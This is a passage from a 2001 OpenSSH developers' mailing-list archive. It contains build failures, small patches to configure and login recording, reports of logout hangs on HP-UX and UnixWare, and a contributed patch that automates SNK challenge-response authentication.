"/opt/KTHkrb4/include/ktypes.h", line 14: warning: typedef redeclared: u_int8_t "/opt/KTHkrb4/include/ktypes.h", line 15: warning: typedef redeclared: u_int16_t "/opt/KTHkrb4/include/ktypes.h", line 16: warning: typedef redeclared: u_int32_t "/usr/include/crypt.h", line 23: identifier redeclared: des_encrypt current : function(pointer to char, int) returning void previous: function(pointer to unsigned long, pointer to struct des_ks_struct {union {..} ks}, int) returning void : "/opt/KTHkrb4/include/des.h", line 181 cc: acomp failed for ../openssh-2.9p1/auth-passwd.c *** Error code 2 make: Fatal error: Command failed for target `auth-passwd.o' From pere at opera.com Thu Jun 7 03:09:39 2001 From: pere at opera.com (Petter Reinholdtsen) Date: Wed, 06 Jun 2001 19:09:39 +0200 Subject: configure patch for Alpha/Tru64 Unix 5.1 Message-ID: I had to apply this patch to configure.in to get configure to run on Tru64 Unix on Alpha. The RSA test forgot to reset $LIBS. (The compile stopped with missing "zlib.h". I'll send more patches if required. :-) diff -ur src-2.9p1/configure.in src-2.9p1-local/configure.in --- src-2.9p1/configure.in Wed Jun 6 17:15:09 2001 +++ src-2.9p1-local/configure.in Wed Jun 6 19:06:07 2001 @@ -683,6 +683,7 @@ break; ], []) done +LIBS="$saved_LIBS" if test ! -z "$no_rsa" ; then AC_MSG_RESULT(disabled) @@ -698,7 +699,7 @@ else RSA_MSG="yes (using RSAref)" AC_MSG_RESULT(using RSAref) - LIBS="$saved_LIBS -lcrypto -lRSAglue -lrsaref" + LIBS="$LIBS -lcrypto -lRSAglue -lrsaref" fi fi fi -- ##> Petter Reinholdtsen <## | pere at td.org.uit.no O- http://www.hungry.com/~pere/ | Go Mozilla, go! Go! From wayne at blorf.net Thu Jun 7 03:28:36 2001 From: wayne at blorf.net (Wayne Davison) Date: Wed, 6 Jun 2001 10:28:36 -0700 (PDT) Subject: Remove duplicate "last" log messages with UseLogin Message-ID: Using UseLogin on a system that has to twiddle utmpx before calling login currently also twiddles wtmpx, and this causes problems on Solaris in the "last" log. Changing the source to avoid modifying wtmpx when also modifying utmpx fixes things up nicely: Index: loginrec.c --- loginrec.c 2001/05/08 20:33:06 1.33 +++ loginrec.c 2001/06/06 17:14:25 @@ -456,9 +456,10 @@ # endif # ifdef USE_UTMPX utmpx_write_entry(li); -# endif -# ifdef USE_WTMPX +# else +# ifdef USE_WTMPX wtmpx_write_entry(li); +# endif # endif return 0; } Now running "last -10" after logging in has only a single entry for each ssh user, rather than a totally bogus entry before each valid entry. I'd be interested in knowing if this works properly on UNICOS or not. ..wayne.. From wayne at blorf.net Thu Jun 7 04:22:20 2001 From: wayne at blorf.net (Wayne Davison) Date: Wed, 6 Jun 2001 11:22:20 -0700 (PDT) Subject: One more UseLogin tweak Message-ID: One other thing I noticed in the record_utmp_only() function is that it wasn't setting the timestamp in the logininfo structure. The following patch takes care of this: --- old/loginrec.c Wed Jun 6 11:12:14 2001 +++ loginrec.c Wed Jun 6 11:13:42 2001 @@ -448,6 +448,8 @@ login_utmp_only(struct logininfo *li) { li->type = LTYPE_LOGIN; + /* set the timestamp */ + login_set_current_time(li); # ifdef USE_UTMP utmp_write_entry(li); # endif ..wayne.. From frank.beckmann at d2vodafone.de Wed Jun 6 19:18:41 2001 From: frank.beckmann at d2vodafone.de (Frank Beckmann) Date: Wed, 06 Jun 2001 11:18:41 +0200 Subject: Solaris 2.6 Use Login Message-ID: <3B1DF571.1B9BC31D@d2vodafone.de> Hello We want to use UseLogin Function. I have download the latest snapshot and try it on a Solaris 2.6 System. We working whit special pam_modules, the modules can dienes services whit controll files based on local tables and NIS. We are Log the connects Here a Log whitout UseLogin Wed Jun 6 10:37:27 2001 [12265]#1: Access by user fbeckman with service sshd from zvadm1 on ? Wed Jun 6 10:37:27 2001 [12265]#2: Info: using NIS for host map (/etc/pam_hosts.tab) Wed Jun 6 10:37:27 2001 [12265]#3: Info: using NIS for ip map (/etc/pam_ip.tab) Wed Jun 6 10:37:27 2001 [12265]#4: Info: using NIS for user map (/etc/pam_users.tab) Wed Jun 6 10:37:27 2001 [12265]#5: Successful *** Here whit UseLogin !!!*** Wed Jun 6 10:36:56 2001 [12259]#1: Access by user fbeckman with service telnet from zvadm1 on /dev/pts/25 Wed Jun 6 10:36:56 2001 [12259]#2: Info: using NIS for host map (/etc/pam_hosts.tab) Wed Jun 6 10:36:56 2001 [12259]#3: Reject by PAM host NIS: Host permission denied Do you see the different ? ssh identyfied as telenet. It is a big securty problem, we can not see is it a telnet or ssh connect. Greetings from Germany Frank From stevesk at pobox.com Thu Jun 7 06:57:00 2001 From: stevesk at pobox.com (Kevin Steves) Date: Wed, 6 Jun 2001 13:57:00 -0700 (PDT) Subject: Failure to compile OpenSSH. In-Reply-To: <200106061131.f56BVxg16901@sirppi.helsinki.fi> Message-ID: On Wed, 6 Jun 2001, Atro Tossavainen wrote: :HP: Configure succeeds, build fails. (5) :(5) :cc -Ae -I/afs/bi/p/include -Ae -I. -I.. -I. -I./.. -I/afs/bi/v/@sys/libraries/openssl/latest/include -D_HPUX_SOURCE -I/usr/athena/include -I/usr/afsws/include -DHAVE_CONFIG_H -c strmode.c :cc: "../openbsd-compat/glob.h", line 48: warning 617: Redeclaration of tag "stat" ignored. :cc: "strmode.c", line 45: error 1711: Inconsistent parameter list declaration for "strmode". :gmake[1]: *** [strmode.o] Error 1 :gmake[1]: Leaving directory `/scratch/openssh-2.9p1/openbsd-compat' :gmake: *** [openbsd-compat/libopenbsd-compat.a] Error 2 that's a compiler bug that was fixed a long time ago. you can sync the function definition and declaration to be the same, or try: ftp.itrc.hp.com/superseded_patches/hp-ux_patches/s700_800/10.X/PHSS_17507.txt the newer compiler patches are only on the applications CDs that you get as part of software support, but i think that patch will fix it. From stevesk at pobox.com Thu Jun 7 07:16:13 2001 From: stevesk at pobox.com (Kevin Steves) Date: Wed, 6 Jun 2001 14:16:13 -0700 (PDT) Subject: Defect: OpenSSH hangs on logout In-Reply-To: <20010606082224.C24958@eeg.ccf.org> Message-ID: On Wed, 6 Jun 2001, Greg Wooledge wrote: :> this is caused by select() being restarted for SIGCHLD on HP-UX due to the :> use of SA_RESTART. can you try the patch below and see if it fixes the :> problem for HP-UX and linux? i've tested on HP-UX 11.11. : :> -#if defined(SA_RESTART) :> +#if 0 : :This doesn't seem to make any difference on HP-UX 10.20. But then, :I'm using OpenSSH 2.5.2p2 instead of 2.9.x or CVS -- would that matter? [changing to openssh-unix-dev] i haven't used 10.20 for a long time. i'm currently only working with 11.11. i don't know if select() is restarted when SA_RESTART on 10.20, but i'd guess it is. while 2.5.2p2 has the SA_RESTART change, it would be best to test with 2.9. so: does 10.20 hang with 2.9 without the patch? with the patch? From jrippas at mizuhocap.com Thu Jun 7 07:49:16 2001 From: jrippas at mizuhocap.com (James Rippas) Date: Wed, 06 Jun 2001 17:49:16 -0400 Subject: One more UseLogin tweak -- why are the binaries so big? References: Message-ID: <3B1EA55C.C81B704F@mizuhocap.com> This works except the binaries seem to have gotten quite large. Is this normal with snapshots? When configured with the following options: --prefix=/usr/ssh --with-pcre --sysconfdir=/etc --with-pid-dir=/etc/ --with-random=/dev/random 2.9p1 -rwxr-xr-x 1 root sys 1225576 May 11 08:49 /usr/ssh/sbin/sshd.orig* openssh-SNAP-20010606 + UseLogin tweaks -rwxr-xr-x 1 root other 4614312 Jun 6 16:52 /usr/ssh/sbin/sshd* -jim Wayne Davison wrote: > > One other thing I noticed in the record_utmp_only() function is that > it wasn't setting the timestamp in the logininfo structure. The > following patch takes care of this: > > --- old/loginrec.c Wed Jun 6 11:12:14 2001 > +++ loginrec.c Wed Jun 6 11:13:42 2001 > @@ -448,6 +448,8 @@ > login_utmp_only(struct logininfo *li) > { > li->type = LTYPE_LOGIN; > + /* set the timestamp */ > + login_set_current_time(li); > # ifdef USE_UTMP > utmp_write_entry(li); > # endif > > ..wayne.. -------------- next part -------------- --------------------------------------------------------- This e-mail contains information some or all of which may be confidential, proprietary and/or legally privileged. If an addressing or transmission error has misdirected this e-mail, please notify the sender by replying to this e-mail. If you are not the intended recipient you must not use, disclose, distribute, copy, print or rely on this e-mail. --------------------------------------------------------- From markus.friedl at informatik.uni-erlangen.de Thu Jun 7 08:36:30 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 7 Jun 2001 00:36:30 +0200 Subject: ssh-keyscan for ssh2 In-Reply-To: ; from wayne@blorf.net on Sat, May 19, 2001 at 02:14:53PM -0700 References: <20010519174431.A8551@folly> Message-ID: <20010607003630.A3268@folly> On Sat, May 19, 2001 at 02:14:53PM -0700, Wayne Davison wrote: > On Sat, 19 May 2001, Markus Friedl wrote: > > i think you can overload fatal() with longjmp(). > > Yeah, I was thinking of doing the same thing. I didn't do it earlier > because it means moving fatal() into its own file so that we don't end > up with a duplicate symbol. no, this is not needed. just do this instead: void fatal_callback(void *arg) { if (nonfatal_fatal) longjmp(kexjmp, -1); } and fatal_add_cleanup(fatal_callback, NULL); in main() From ecashin at terry.uga.edu Thu Jun 7 08:40:03 2001 From: ecashin at terry.uga.edu (Ed L Cashin) Date: 06 Jun 2001 18:40:03 -0400 Subject: proposal for cosmetic change: prompts Message-ID: Hi. If I submit patches that make the prompts look more like prompts, would those patches be welcome? Before: ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa Need passphrase for /home/ecashin/.ssh/id_dsa Enter passphrase for /home/ecashin/.ssh/id_dsa After (model 1): ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa Need passphrase for /home/ecashin/.ssh/id_dsa Enter passphrase for "/home/ecashin/.ssh/id_dsa": After (model 2): ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa Need passphrase for /home/ecashin/.ssh/id_dsa Enter passphrase for identity (/home/ecashin/.ssh/id_dsa): There's a space after the colon, BTW. If this cosmetic change is desirable, which is preferable, model one or model two? -- --Ed Cashin PGP public key: ecashin at terry.uga.edu http://www.terry.uga.edu/~ecashin/pgp/ From tom at avatar.itc.nrcs.usda.gov Thu Jun 7 08:40:51 2001 From: tom at avatar.itc.nrcs.usda.gov (Tom Rudnick) Date: Wed, 6 Jun 2001 16:40:51 -0600 (MDT) Subject: HPUX: ssh hangs after shell exit In-Reply-To: from "Kevin Steves" at Jun 05, 2001 04:03:24 PM Message-ID: <200106062240.QAA06761@avatar.itc.nrcs.usda.gov> ... > : > :1) establish connection to sshd using ssh simply via "ssh remote-host" > :2) type exit in interactive shell on remote-host. > :3) "logout" is echoed to the terminal and the local shell prompt is NOT > :echoed. > :4) type any other key, usually i just hit the space-bar. <<--PROBLEM IS > :HERE > :5) "Connection to remote-host closed." is echoed to the terminal > :followed by the local shell prompt. > > can you try the patch at the end? hp-ux (and possibly the other systems > you mentioned) restart select() when SA_RESTART which we were setting for > SIGCHLD, and we should not have select() restarted. > > i would also be interested in someone with Unixware trying this so we can > further verify issues with grantpt(), which is why we added the restart > code in the first place. I just built 2.9p1 from the cvs (as of 16:00 MDT) and tested for the hang problem on UnixWare 2.1.3. The problem does not manifest here. Typing exit pauses for about a second, then the session closes. Let me know specifically what you want tested on Unixware and I'll gladly do so. I have Unixware 2.1.3 and 2.03 systems to build on. Unfortunately I have to defer all Unixware 7.x testing to someone else. I'm the guy that asked for SA_RESTART to be added so Protocol 2 would work on Unixware, ...and am very willing to help solve problems so that it remains. :) Thanks, -Tom Rudnick -- ----------------/---------------------------------------------- Tom Rudnick | USDA Natural Resources Conservation Service Fort Collins,CO | tom at avatar.itc.nrcs.usda.gov (970) 295-5427 ** The 3rd Millennium started Jan 1, 2001. see: ** ** http://aa.usno.navy.mil/AA/faq/docs/millennium.html ** -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From Darren.Moffat at eng.sun.com Thu Jun 7 09:12:54 2001 From: Darren.Moffat at eng.sun.com (Darren Moffat) Date: Wed, 6 Jun 2001 16:12:54 -0700 (PDT) Subject: proposal for cosmetic change: prompts Message-ID: <200106062314.f56NESQ308372@jurassic.eng.sun.com> >Before: > ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa > Need passphrase for /home/ecashin/.ssh/id_dsa > Enter passphrase for /home/ecashin/.ssh/id_dsa > >After (model 1): > ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa > Need passphrase for /home/ecashin/.ssh/id_dsa > Enter passphrase for "/home/ecashin/.ssh/id_dsa": > >After (model 2): > ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa > Need passphrase for /home/ecashin/.ssh/id_dsa > Enter passphrase for identity (/home/ecashin/.ssh/id_dsa): > >There's a space after the colon, BTW. If this cosmetic change is >desirable, which is preferable, model one or model two? model 3: ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa Enter passphrase for /home/ecashin/.ssh/id_dsa: Why bother saying Need and then Enter since Enter implies Need. -- Darren J Moffat From Markus.Friedl at informatik.uni-erlangen.de Thu Jun 7 09:22:42 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 7 Jun 2001 01:22:42 +0200 Subject: proposal for cosmetic change: prompts In-Reply-To: <200106062314.f56NESQ308372@jurassic.eng.sun.com>; from Darren.Moffat@eng.sun.com on Wed, Jun 06, 2001 at 04:12:54PM -0700 References: <200106062314.f56NESQ308372@jurassic.eng.sun.com> Message-ID: <20010607012242.A938@faui02.informatik.uni-erlangen.de> On Wed, Jun 06, 2001 at 04:12:54PM -0700, Darren Moffat wrote: > > Need passphrase for /home/ecashin/.ssh/id_dsa > > Enter passphrase for identity (/home/ecashin/.ssh/id_dsa): > > > >There's a space after the colon, BTW. If this cosmetic change is > >desirable, which is preferable, model one or model two? > > model 3: > > ecashin at nilda ecashin$ ssh-add ~/.ssh/id_dsa > Enter passphrase for /home/ecashin/.ssh/id_dsa: > > > Why bother saying Need and then Enter since Enter implies Need. it was a debugging message, i'll remove it. From ldanna at tislabs.com Thu Jun 7 09:35:21 2001 From: ldanna at tislabs.com (Larry D'Anna) Date: Wed, 6 Jun 2001 19:35:21 -0400 Subject: snk authentication Message-ID: <20010606193521.A22645@clipper.gw.tislabs.com> Here is a little patch against 2.9p1 that performs the SNK (also known as TIS authserv) challenge-response automaticly instead of asking the user. hope you find it useful. --larry -------------- next part -------------- diff -NuBw openssh-2.9p1/Makefile.in openssh/Makefile.in --- openssh-2.9p1/Makefile.in Thu Apr 26 20:31:08 2001 +++ openssh/Makefile.in Wed Jun 6 16:15:56 2001 @@ -43,9 +43,9 @@ @NO_SFTP at SFTP_PROGS=sftp-server$(EXEEXT) sftp$(EXEEXT) -TARGETS=ssh$(EXEEXT) sshd$(EXEEXT) ssh-add$(EXEEXT) ssh-keygen$(EXEEXT) ssh-keyscan${EXEEXT} ssh-agent$(EXEEXT) scp$(EXEEXT) $(SFTP_PROGS) +TARGETS=ssh$(EXEEXT) sshd$(EXEEXT) ssh-add$(EXEEXT) ssh-keygen$(EXEEXT) ssh-keyscan${EXEEXT} ssh-agent$(EXEEXT) scp$(EXEEXT) snk$(EXEEXT) $(SFTP_PROGS) -LIBSSH_OBJS=atomicio.o authfd.o authfile.o bufaux.o buffer.o canohost.o channels.o cipher.o cli.o compat.o compress.o crc32.o deattack.o dh.o dispatch.o mac.o hostfile.o key.o kex.o kexdh.o kexgex.o log.o match.o misc.o mpaux.o nchan.o packet.o radix.o rijndael.o entropy.o readpass.o rsa.o ssh-dss.o ssh-rsa.o tildexpand.o ttymodes.o uidswap.o uuencode.o xmalloc.o +LIBSSH_OBJS=atomicio.o authfd.o authfile.o bufaux.o buffer.o canohost.o channels.o cipher.o cli.o compat.o compress.o crc32.o deattack.o dh.o dispatch.o mac.o hostfile.o key.o kex.o kexdh.o kexgex.o log.o match.o misc.o mpaux.o nchan.o packet.o radix.o rijndael.o entropy.o readpass.o rsa.o ssh-dss.o ssh-rsa.o tildexpand.o ttymodes.o uidswap.o uuencode.o xmalloc.o snk.o SSHOBJS= ssh.o sshconnect.o sshconnect1.o sshconnect2.o sshtty.o readconf.o clientloop.o @@ -118,6 +118,9 @@ sftp$(EXEEXT): $(LIBCOMPAT) libssh.a sftp.o sftp-client.o sftp-int.o sftp-common.o sftp-glob.o scp-common.o $(LD) -o $@ sftp.o sftp-client.o sftp-common.o sftp-int.o sftp-glob.o scp-common.o $(LDFLAGS) -lssh -lopenbsd-compat $(LIBS) + +snk$(EXEEXT): $(LIBCOMPAT) snkmain.o snk.o + $(LD) -o $@ snkmain.o snk.o -lcrypto # test driver for the loginrec code - not built by default logintest: logintest.o $(LIBCOMPAT) libssh.a loginrec.o Common subdirectories: openssh-2.9p1/contrib and openssh/contrib Common subdirectories: openssh-2.9p1/openbsd-compat and openssh/openbsd-compat diff -NuBw openssh-2.9p1/readconf.c openssh/readconf.c --- openssh-2.9p1/readconf.c Tue Apr 17 14:11:37 2001 +++ openssh/readconf.c Wed Jun 6 14:38:23 2001 @@ -111,7 +111,7 @@ oGlobalKnownHostsFile2, oUserKnownHostsFile2, oPubkeyAuthentication, oKbdInteractiveAuthentication, oKbdInteractiveDevices, oHostKeyAlias, oDynamicForward, oPreferredAuthentications, oHostbasedAuthentication, - oHostKeyAlgorithms + oHostKeyAlgorithms, oSNKFile } OpCodes; /* Textual representations of the tokens. */ @@ -177,6 +177,7 @@ { "dynamicforward", oDynamicForward }, { "preferredauthentications", oPreferredAuthentications }, { "hostkeyalgorithms", oHostKeyAlgorithms }, + { "SNKFile", oSNKFile }, { NULL, 0 } }; @@ -435,6 +436,10 @@ charptr = &options->system_hostfile; goto parse_string; + case oSNKFile: + charptr = &options->snk_keyfile; + goto parse_string; + case oUserKnownHostsFile: charptr = &options->user_hostfile; goto parse_string; @@ -761,6 +766,7 @@ options->num_remote_forwards = 0; options->log_level = (LogLevel) - 1; options->preferred_authentications = NULL; + options->snk_keyfile = NULL; } /* diff -NuBw openssh-2.9p1/readconf.h openssh/readconf.h --- openssh-2.9p1/readconf.h Tue Apr 17 14:11:37 2001 +++ openssh/readconf.h Wed Jun 6 15:07:34 2001 @@ -97,6 +97,8 @@ /* Remote TCP/IP forward requests. */ int num_remote_forwards; Forward remote_forwards[SSH_MAX_FORWARDS_PER_DIRECTION]; + + char *snk_keyfile; /* Path to a file with an encrypted snk key */ } Options; diff -NuBw openssh-2.9p1/snk.c openssh/snk.c --- openssh-2.9p1/snk.c Wed Dec 31 19:00:00 1969 +++ openssh/snk.c Wed Jun 6 19:25:27 2001 @@ -0,0 +1,176 @@ + + + +/* by Brian Wellington and / or Jeff Cook */ + +#include +#include + +#include +#include + +static int +make_key_sched(char *s, des_cblock k) { + int k0, k1, k2, k3, k4, k5, k6, k7; + int x; + + x = sscanf(s, "%o %o %o %o %o %o %o %o", + &k0, &k1, &k2, &k3, &k4, &k5, &k6, &k7); + if(x != 8) + return(1); + k[0] = k0; + k[1] = k1; + k[2] = k2; + k[3] = k3; + k[4] = k4; + k[5] = k5; + k[6] = k6; + k[7] = k7; + return(0); +} + + + +int do_snk(char *chal, char *pass, char *rbuf) { + des_key_schedule keysched; + des_cblock kblock; + char buf[12]; + char cbuf[12]; + int i; + int j; + unsigned long kval = 0; + + /* set up a key from the shared secret */ + if(make_key_sched(pass,kblock)) { + strcpy(rbuf,"Cannot decode user secret key"); + return(1); + } + for(i=0; i < 64; i++)pass[i]=0; + + des_set_key((des_cblock *)kblock,keysched); + + /* zeroize the entire buffer */ + for(i = 0; i < 9; i++) + buf[i] = '\0'; + strncpy(buf,chal,8); + + /* push it through the rotating knives */ + des_ecb_encrypt((des_cblock *)buf, (des_cblock *)cbuf, keysched, + DES_ENCRYPT); + + /* pull some bits out of the ciphertext into a long */ + for(i=0; i<4; i++) + for(j = 0; j < 8; j++) + kval = (kval << 1) | ((cbuf[i] >> (7 - j)) & 1); + + /* crunch it into a hex string */ + sprintf(buf,"%08lx",kval); + + /* crunch hex to decimal and try that */ + for(i=0; buf[i]; i++) + if(buf[i] == 'a' || buf[i] == 'b' || buf[i] == 'c') + buf[i] = '2'; + else + if(buf[i] == 'd' || buf[i] == 'e' || buf[i] == 'f') + buf[i] = '3'; + strcpy(rbuf, buf); + return(0); +} + +/* Get the DES key from the specified data. */ + +int get_snk_pass(char *pass, char *res, int reslen, char *data) { + des_cblock kblock; + des_key_schedule keysched; + char kbuf[16]; + des_cblock iv; + int i, j; + char *p; + MD5_CTX ctx; + unsigned char digest[16]; + + if(data[0] ){ + des_string_to_key(pass, &kblock); + des_set_key((des_cblock *)kblock, keysched); + p = (char *)&iv; + for(i=0; i < 8; i++)*p++ = 130-i; + + des_cbc_encrypt((des_cblock *)data, (des_cblock *)kbuf, 16l, + keysched, &iv, DES_DECRYPT); + j = (kbuf[8]&0xff) + (kbuf[9]&0xff) * 256; + if( j < 0 || j >=reslen){ + return 1; + } + MD5_Init(&ctx); + MD5_Update(&ctx, (unsigned char *)&kbuf[8], 2); + MD5_Update(&ctx, (unsigned char *)&kbuf[10], (j<=6) ? j : 6); + + strncpy(res, &kbuf[10], 6); + res[6] = '\0'; + j -= 6; + if( j > 0){ + i = (j+7)& 0xf8; + des_cbc_encrypt((des_cblock *)&data[16], + (des_cblock *)&res[6], i*1l, + keysched, &iv, DES_DECRYPT); + MD5_Update(&ctx, (unsigned char *)&res[6], j); + } + res[6+j] = '\0'; + + MD5_Final(digest, &ctx); + for(i=0; i < 8; i++){ + if( digest[i] != (kbuf[i]&0xff)) + return 1; + } + }else{ + strncpy(res, pass, reslen); + } + return 0; +} + + + +int put_snk_pass(char *pass, char *res, int reslen, char *data) { + des_cblock kblock; + des_key_schedule keysched; + char kbuf[16]; + des_cblock iv; + int i, j; + char *p; + MD5_CTX ctx; + unsigned char digest[16]; + + des_string_to_key(pass, &kblock); + des_set_key((des_cblock *)kblock, keysched); + p = (char *)&iv; + for(i=0; i < 8; i++)*p++ = 130-i; + + kbuf[8] = reslen&0xff; + kbuf[9] = (reslen >> 8)&0xff; + for(i=0; i < 6 && i < reslen; i++) + kbuf[10+i] = res[i]; + MD5_Init(&ctx); + MD5_Update(&ctx, (unsigned char *)&kbuf[8], 2); + MD5_Update(&ctx, res, reslen); + MD5_Final(digest, &ctx); + for(i=0; i < 8; i++) + kbuf[i] = digest[i]; + + des_cbc_encrypt((des_cblock *)kbuf, (des_cblock *)data, 16l, + keysched, &iv, DES_ENCRYPT); + j = reslen - 6; + if( j > 0){ + i = (j+7)& 0xf8; + des_cbc_encrypt((des_cblock *)&res[6], (des_cblock *)&data[16], + i*1l, keysched, &iv, DES_ENCRYPT); + } + return 0; +} + + +int valid_secret_p (char *s) { + int x, y; + x = sscanf(s, "%o %o %o %o %o %o %o %o", + &y, &y, &y, &y, &y, &y, &y, &y); + return x == 8; +} diff -NuBw openssh-2.9p1/snk.h openssh/snk.h --- openssh-2.9p1/snk.h Wed Dec 31 19:00:00 1969 +++ openssh/snk.h Wed Jun 6 15:56:23 2001 @@ -0,0 +1,9 @@ + + +extern int do_snk(char *, char *, char *); +extern int get_snk_pass(char *pass, char *res, int reslen, char *data); +extern int put_snk_pass(char *pass, char *res, int reslen, char *data); +extern int valid_secret_p (char *s); + + + diff -NuBw openssh-2.9p1/snkmain.c openssh/snkmain.c --- openssh-2.9p1/snkmain.c Wed Dec 31 19:00:00 1969 +++ openssh/snkmain.c Wed Jun 6 19:24:58 2001 @@ -0,0 +1,256 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "snk.h" + + +/* + * originaly written by Brian Wellington and / or Jeff Cook + * modified by Larry D'Anna + */ + + +#define hexvalue(c) ((tolower(c) < 'a') ? (tolower(c) - '0') : (tolower(c) - 'a' + 10)) + +char *keyfile, *outfile = NULL; + +static void +usage() { + fprintf (stderr, "Usage:\n"); + fprintf (stderr, "snk [-f keyfile] [challenge] Compute response\n"); + fprintf (stderr, "snk -w [-f keyfile] Save Key\n"); + fprintf (stderr, "snk -p [-f keyfile] [-o outfile] Change Passphrase\n"); +} + +void save_snk() { + FILE *fp; + char secret[256]; + char password[256]; + int i,x1,x2,x3,x4,x5,x6,x7,x8; + int y1,y2,y3,y4,y5,y6,y7,y8; + unsigned char data[48]; + + get_key: + strncpy(secret, getpass("Enter SNK secret key: "), sizeof(secret)); + if (sscanf(secret, "%d %d %d %d %d %d %d %d", &x1, &x2, &x3, &x4, &x5, &x6, &x7, &x8) != 8) { + fprintf (stderr, "Error: Invalid secret key\n"); + goto get_key; + } + if (sscanf(getpass("Repeat: "), "%d %d %d %d %d %d %d %d", + &y1, &y2, &y3, &y4, &y5, &y6, &y7, &y8) != 8 || + x1 != y1 || x2 != y2 || x3 != y3 || x4 != y4 || + x5 != y5 || x6 != y6 || x7 != y7 || x8 != y8 ) { + fprintf (stderr, "Keys do not match\n"); + goto get_key; + } + get_password: + strncpy(password, getpass("Enter SNK passphrase: "), sizeof(password)); + if ( strcmp(password, getpass("Repeat: ")) != 0 ) { + fprintf (stderr, "Passphrases do not match\n"); + goto get_password; + } + memset(data, 0, sizeof(data)); + put_snk_pass(password, secret, strlen(secret) + 1, data); + fp = fopen (outfile, "w"); + if (fp == NULL) { + fprintf (stderr, "Error: Cannot create %s\n", keyfile); + exit(1); + } + if ( chmod(keyfile, S_IRUSR|S_IWUSR) == -1 ) + fprintf (stderr, "Error: cannot set permissions on %s\n", keyfile); + for (i=0; ipw_dir) + 10); + snprintf (keyfile, strlen(pwd->pw_dir)+10, "%s/.snk", pwd->pw_dir); + outfile = keyfile; + + while ((ch = getopt(argc, argv, "hwpf:o:")) != -1) { + switch (ch) { + case 'w': + if (mode != mDefault) { + fprintf (stderr, "Error: -w and -p may only be used once.\n"); + return 1; + } + mode = mWrite; + break; + case 'p': + if (mode != mDefault) { + fprintf (stderr, "Error: -w and -p may only be used once.\n"); + return 1; + } + mode = mPasswd; + break; + case 'f': + keyfile = optarg; + break; + case 'o': + outfile = optarg; + break; + case '?': + case 'h': + default: + usage(); + return 1; + } + } + argc -= optind; + argv += optind; + + switch (mode) { + case mWrite: + if (argc != 0) { + usage(); + return 1; + } + save_snk(); + break; + case mPasswd: + if (argc != 0) { + usage(); + return 1; + } + passwd(); + break; + case mDefault: + if (argc == 0) + compute_snk (NULL); + else if ( argc == 1 ) + compute_snk (argv[0]); + else { + usage(); + return 1; + } + break; + } + + return 0; + +} diff -NuBw openssh-2.9p1/sshconnect1.c openssh/sshconnect1.c --- openssh-2.9p1/sshconnect1.c Tue Apr 17 14:08:16 2001 +++ openssh/sshconnect1.c Wed Jun 6 17:57:41 2001 @@ -43,6 +43,8 @@ #include "readpass.h" #include "cipher.h" #include "canohost.h" +#include "snk.h" + /* Session id for the current session. */ u_char session_id[16]; @@ -611,6 +613,8 @@ #endif /* AFS */ +#define hexvalue(c) ((tolower(c) < 'a') ? (tolower(c) - '0') : (tolower(c) - 'a' + 10)) + /* * Tries to authenticate with any string-based challenge/response system. * Note that the client code is not tied to s/key or TIS. @@ -624,6 +628,9 @@ char prompt[1024]; char *challenge, *response; + char *octchal, *p, *q; + + debug("Doing challenge reponse authentication."); for (i = 0; i < options.number_of_password_prompts; i++) { @@ -644,6 +651,51 @@ } challenge = packet_get_string(&clen); packet_integrity_check(payload_len, (4 + clen), type); + + if (options.snk_keyfile != NULL) { + FILE *fp; + int len; + unsigned char data[48]; + char secret[256]; + char *password; + + octchal = (char *) xmalloc (clen); + memset (octchal, 0, clen); + for (p = challenge, q = octchal; *p; p++) + if ('0' <= *p && *p <= '9') + *q++ = *p; + debug ("SNK challenge is %s", octchal); + + fp = fopen (options.snk_keyfile, "r"); + if (fp == NULL) { + debug ("Cannot open SNK keyfile: %s", options.snk_keyfile); + return 0; + } + len = 0; + memset(data, 0, sizeof(data)); + while (len < sizeof(data)) { + int c1 = fgetc(fp); + int c2 = fgetc(fp); + if (c1 == '\n' || c1 == EOF || c2 == '\n' || c2 == EOF) + break; + data[len++] = (hexvalue(c1) << 4 ) + hexvalue(c2); + } + fclose(fp); + + get_snk_pass("", secret, sizeof(secret), data); + if (! valid_secret_p(secret) ) { + password = read_passphrase("Enter passphrase for SNK secret:", 0); + get_snk_pass(password, secret, sizeof(secret), data); + xfree (password); + if (! valid_secret_p(secret) ) { + error("Cannot decode user SNK secret"); + return 0; + } + } + response = (char *) xmalloc (256); + do_snk(octchal, secret, response); + debug ("SNK response is %s", response); + } else { snprintf(prompt, sizeof prompt, "%s%s", challenge, strchr(challenge, '\n') ? "" : "\nResponse: "); xfree(challenge); @@ -657,6 +709,7 @@ xfree(response); break; } + } packet_start(SSH_CMSG_AUTH_TIS_RESPONSE); ssh_put_password(response); memset(response, 0, strlen(response)); From tim at multitalents.net Thu Jun 7 12:10:23 2001 From: tim at multitalents.net (Tim Rice) Date: Wed, 6 Jun 2001 19:10:23 -0700 (PDT) Subject: HPUX: ssh hangs after shell exit In-Reply-To: <200106062240.QAA06761@avatar.itc.nrcs.usda.gov> Message-ID: On Wed, 6 Jun 2001, Tom Rudnick wrote: > ... > > : > > :1) establish connection to sshd using ssh simply via "ssh remote-host" > > :2) type exit in interactive shell on remote-host. > > :3) "logout" is echoed to the terminal and the local shell prompt is NOT > > :echoed. > > :4) type any other key, usually i just hit the space-bar. <<--PROBLEM IS > > :HERE > > :5) "Connection to remote-host closed." is echoed to the terminal > > :followed by the local shell prompt. > > > > can you try the patch at the end? hp-ux (and possibly the other systems > > you mentioned) restart select() when SA_RESTART which we were setting for > > SIGCHLD, and we should not have select() restarted. > > > > i would also be interested in someone with Unixware trying this so we can > > further verify issues with grantpt(), which is why we added the restart > > code in the first place. > > > I just built 2.9p1 from the cvs (as of 16:00 MDT) and tested for the > hang problem on UnixWare 2.1.3. > > The problem does not manifest here. Typing exit pauses for about a second, > then the session closes. True enough. Just for fun I tried the patch on my 2.03 box. The patch breaks protocol 